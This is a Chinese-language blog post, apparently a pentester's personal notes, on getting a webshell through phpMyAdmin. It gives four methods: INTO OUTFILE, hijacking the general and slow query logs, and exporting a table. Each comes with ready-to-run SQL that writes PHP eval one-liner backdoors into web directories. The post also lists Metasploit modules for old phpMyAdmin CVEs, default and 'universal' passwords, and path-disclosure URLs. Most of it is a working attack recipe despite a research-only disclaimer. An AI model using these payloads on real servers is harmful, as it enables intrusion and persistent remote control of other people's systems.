phpmyadmin getshell
phpmyadmin getshell
- 前言
- 一、into outfile写马
- 条件
- 利用方法
- 操作
- 二、开启日志写马getshell
- 条件
- 利用方法
- 操作
- 三、慢查询webshell
- 利用方法
- 操作
- 四、创建数据库和表写入webshell
- 条件
- 利用方法
- 特殊版本getshell
所有文章,仅供安全研究与学习之用,后果自负!
前言
phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。
虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。
一、into outfile写马
条件
1.对web目录需要有写权限能够使用单引号
2.secure_file_priv 不为null 具体描述在下边。
3.要知道网站的绝对路径,写入马才能连接。mysql into写入文件:使用需看要secure_file_priv的值。value为“null”时,不允许读取任意文件value为其余路径时,表示该路径可以读写文件value为“空”时,允许读取任意文件
利用方法
先根据各种信息收集 判断或猜测出网站的绝对路径
比如 如果是 phpstudy启动的 根据 mysql 安装路径 就可以猜出网站的位置
如果是 linux 一般位于 /var/www/html
select @@basedir; 查找mysql安装路径show global variables like '%secure_file_priv%';
NULL 不允许导入或导出
/tmp 只允许在 /tmp 目录导入导出
空 不限制目录如果有权限
select '<?php @eval($_POST[a]);?>'INTO OUTFILE '/var/www/html/shell.php'
操作
根据 下图 得知 是linux 系统 猜测网站位置在 /var/ww/html
查看可不可以写文件
将shell.php的马写在网站pma/目录下
蚁剑连接成功
二、开启日志写马getshell
条件
用于 secur_file_priv 为null 或限定值 不在网页目录时
general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell:
general_log:日志保存状态
general_log_file:日志保存路径
利用方法
SHOW VARIABLES LIKE 'general%'; # 查看general_log 是否开启
set global general_log = "ON"; # 开启
set global general_log_file='F:/phpStudy/WWW/shell.php';
select '<?php eval($_POST["pwd"]);?>'
执行完毕后 直接用蚁剑连接
操作
均执行成功
三、慢查询webshell
利用方法
show variables like '%slow%'
set global slow_query_log=on;
set global slow_query_log_file='/var/www/html/pma/slow.php'
select '<?php phpinfo();?>' or sleep(10);
操作
不知道为什么 被拒绝访问
四、创建数据库和表写入webshell
条件
Root数据库用户(root权限);
网站绝对路径(确定有写入权限);
secure_file_priv没有具体值。
利用方法
建库
建表
建字段
插入数据 一句话木马
<?php eval($_POST[pwd]); ?>'
执行SQL查询,将该表中的内容导出到指定文件
物理路径为"/var/www/html/pma"
use test; 连接test数据库
select * from test_table into outfile "/var/www/html/pma/shell.php";
连接成功
最后删除该库
drop database test;
或者用命令也可以 执行
执行下面的sql语句,创建表并在表中写入一句话木马,在导出到网站的根路径。
CREATE TABLE test( id text(500) not null); INSERT INTO test (id) VALUES('<?php @eval($_POST[cmd]);?>'); SELECT id FROM test INTO OUTFILE 'C:/phpstudy/WWW/1.php'; DROP TABLE IF EXISTS test;
特殊版本getshell
CVE-2013-3238
影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG
利用模块:exploit/multi/http/phpmyadminpregreplace
CVE-2012-5159
影响版本:phpMyAdmin v3.5.2.2
利用模块:exploit/multi/http/phpmyadmin3522_backdoor
CVE-2009-1151
PhpMyAdmin配置文件/config/config.inc.php存在命令执行
影响版本:2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
利用模块:exploit/unix/webapp/phpmyadmin_config
Top
弱口令&万能密码
弱口令:版本phpmyadmin2.11.9.2,直接root用户登陆,无需密码
万能密码:版本2.11.3 / 2.11.4,
用户名
'localhost'@'@"
则登录成功
phpMyAdmin暴路径办法:
phpMyAdmin/libraries/select_lang.lib.phpphpMyAdmin/darkblue_orange/layout.inc.phpphpMyAdmin/index.php?lang[]=1phpmyadmin/themes/darkblue_orange/layout.inc.php
例如: 2.11.3 版本
http://192.168.157.156/phpmyadmin/themes/darkblue_orange/layout.inc.php
参考
https://www.cnblogs.com/sunny11/p/13581470.html#_label2
这篇文章 总结很全 可以参考
https://www.cnblogs.com/liliyuanshangcao/p/13815242.html?ivk_sa=1024320u
https://baijiahao.baidu.com/s?id=1714241661462813554&wfr=spider&for=pc
phpmyadmin getshell相关推荐
- phpmyadmin getshell总结
前言 phpMyAdmin 是一个用PHP编写的开源软件工具,可以通过web方式控制和操作MySQL数据库.通过phpMyAdmin 可以完全对数据库进行操作,例如建立.复制和删除数据等. phpmy ...
- phpmyadmin getshell的四种方法
phpmyadmin常见的getshell的几种方法,一共是四种:1.日志文件写 shell2.在知道绝对路径的情况下,利用INTO OUTFILE 3.慢查询写入webshell4.创建数据库和表写 ...
- php如何用菜刀连接getshell,phpmyadmin之getshell总结
title: phpmyadmin中getshell的几种姿势 1,利用全局变量general_log去getshell show variables like '%general%'; 然后将gen ...
- phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现
phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现 一.漏洞描述 二.漏洞影响 三.漏洞复现 1.环境搭建 2.漏洞复现 方法一:命令执行 方法二:phpMyAdm ...
- mysql低权限用户getshell_GetShell的姿势总结
原文来自SecIN社区-作者:WiHat 0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生.Webshell中的WEB就是 ...
- php $_post 报错,关于php输入$_post[‘’]报错的原因
eclipse 启动到loading workbench... 自动关闭 是由于项目没有正常关闭运行而导致"workbench.xmi"中的"persistedState ...
- 红日靶场vulnstack1 内网渗透学习
目录 前言: 信息收集: phpmyadmin getshell 日志写shell yxcms getshell 植入后们: 内网域环境信息收集: 基于msf 进行信息收集: 基于msf 内网信息收集 ...
- 【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有 这一篇真的够了
目录 面经 牛客 奇安信面经(五星推荐) 牛客面经(推荐) 渗透测试面经(推荐) 渗透测试技巧 计网面经 SQL注入漏洞 注入绕过 XXE漏洞 最强面经 Github面经 模拟面 WEB安全 PHP安 ...
- 漏洞:阿里云盾phpMyAdmin =4.8.1 后台checkPageValidity函数缺陷可导致GETSHELL
阿里云盾提示phpMyAdmin <=4.8.1会出现漏洞有被SHELL风险,具体漏洞提醒: 标题 phpMyAdmin <=4.8.1 后台checkPageValidity函数缺陷可导 ...
最新文章
- 新闻媒体的“社会热点事件”催发微博客的诞生
- [BZOJ3093][Fdu校赛2012] A Famous Game(不等概率)
- P6242-[模板]线段树3【吉司机线段树】
- 一文读懂深度学习:从神经元到BERT
- 神奇的go语言(image网站开发)
- ASP.NET MVC模型绑定int超出范围时
- 应用管理系列 — 怎么管理Sybase数据库
- Tensorflow Python3 做神经网络(视频教程)
- Element-UI中Select选择器讲解(el-select详解)
- DotNetCore CAP
- 天龙微信游戏找服务器,《天龙八部3》微信公众号积分系统维护公告
- Snapper:通过同义、分类关键词快速定位并调用WAV文件
- java mongodb json_java向mongoDB中插入Json
- sort函数的用法(C++排序库函数的调用)对数组进行排序,在c++中有库函数帮我们实现,这们就不需要我们自己来编程进行排序了。
- AKA传奇和亚嵌那些事
- 启发:vs运行时提示:应用程序无法正常启动(oxc000007b)。请单击确定关闭应用程序
- 小米手机显示服务器已满,小米云空间不足怎么办 小米云服务空间已满官方解决方案...
- OSG 之学习五:OSG 漫游
- ansible批量免密
- Python地学分析 — GDAL对遥感影像重投影